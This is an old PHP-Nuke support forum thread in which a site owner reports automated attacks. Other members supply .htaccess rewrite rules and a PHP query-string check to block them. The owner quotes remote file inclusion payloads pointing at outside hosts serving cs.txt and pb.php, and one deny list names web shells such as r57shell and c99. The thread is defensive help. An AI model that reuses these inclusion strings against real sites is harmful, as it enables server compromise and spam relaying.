Is this an attack??

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

Hello, for the last month at least, my website has been swarmed with this two filter attacks...

Here is the Agent:

User Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

and for the attacks one is

name=http://amyru.h18.ru/images/cs.txt

well, it has my site and some other stuff in there before that, let me know if you need to see that....

the other one is...

name=http://0x0134.lan.io/pb.php

the http on both are usually the same if i'm not mistaken... I have already banned some countries, like AU an NL, and have blocked who knows how many US IP's and have ranged blocked a lot of IP's from Canada....

So, is this a attack on my site, if so, i guess I'll just have to keep banning IP's if not, i'll need to unban some IP's... I have been getting about 100 plus attacks a day...

a lot of them are the same IP, but I ban them and it's like they just use another IP.

If you need anymore info, just let me know.

My website is... www.guardiansworlds.com

Thanks for any help anyone can share

Site Admin Joined: Aug 17, 2003 Posts: 12482

Yes these are automated attacks against your site. From what I can tell, they allow spammers to use your site to send out their junk emails.

Mostly these are from compromised systems, I doubt blocking IPs would be that effective. At least Nuke Sentinel seems to be working

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

Yeah, it's blocking all of them

Hope it stays that way. So, should I unban the IP's i've blocked?

Captain Joined: Sep 13, 2003 Posts: 355

I use modrewrite in .htaccess to automatically keep those hacking robots out from my site and instead they get a forbidden 403 page. l like modrewrite because it saves Sentinel from blocking a lot of hacking attempts:

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]

By the way my site have been attacked by the identical robot I have found out in the logs.

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

Thanks for the info.

So, is there any type of filter attacks I should keep an eye out for, or should I just not ban any IP that attacks with a filter?

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

Well, I have started unblocking the range block IP's and also, I think I removed the country range block also... Because I just got 520 some emails from my website telling me about each attack....

SO..... I'm thinking about going back and blocking some countries... Sad I have to do that, but that is sure a lot of bot attacks....

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

Well, I have started unblocking the range block IP's and also, I think I removed the country range block also... Because I just got 520 some emails from my website telling me about each attack....

SO..... I'm thinking about going back and blocking some countries... Sad I have to do that, but that is sure a lot of bot attacks....

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

Well, I have started unblocking the range block IP's and also, I think I removed the country range block also... Because I just got 520 some emails from my website telling me about each attack....

SO..... I'm thinking about going back and blocking some countries... Sad I have to do that, but that is sure a lot of bot attacks....

Captain Joined: Sep 13, 2003 Posts: 355

If you have an .htaccess file use modwrite to block these types of automatic hacker attacks and Sentinel will not block them then, but the hackers will not be succesful with their technique.

This is what I have in .htaccess to stop them:

RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} ^libwww(-FM|-perl) [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
RewriteCond % THEME_DIR
RewriteRule ^.* - [F,L]

RewriteEngine on

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

So do I just add that code into my .htaccess file? Or is there a program called modwrite?

Thanks for the info

Captain Joined: Sep 13, 2003 Posts: 355

Yes, it is just to add it in .htaccess. Modrewrite is a module in the apache server that fixes this. It must be installed though in order for it to work.

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

I will try and add that in my .htaccess file. Today, I got 850 some emails...

My website is running on lunarpages server, so, i'm hoping this will work... I guess I will find out tomorrow...

Thanks for the info,

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

Just want to let you know, that worked

Well it seems it has...

Because I checked my email today, and no filter attacks have been sent from my site. Thanks big time.

So is there a place I can keep check, to see if any new code is needed to be added(like if a new attack comes out)??? Just to make sure I'm up to date.

Thanks again Slackervaara, that code did just the trick

Support Mod Joined: Aug 21, 2003 Posts: 335

All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https', $_SERVER['QUERY_STRING'])) {
header('Location: http://' . $_SERVER['SERVER_NAME']);
exit;
}

Nuke Soldier Joined: Aug 09, 2005 Posts: 28

telli wrote:

All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https', $_SERVER['QUERY_STRING'])) {
header('Location: http://' . $_SERVER['SERVER_NAME']);
exit;
}

So, would it be good to use this along with the stuff I have added to the .htacess file?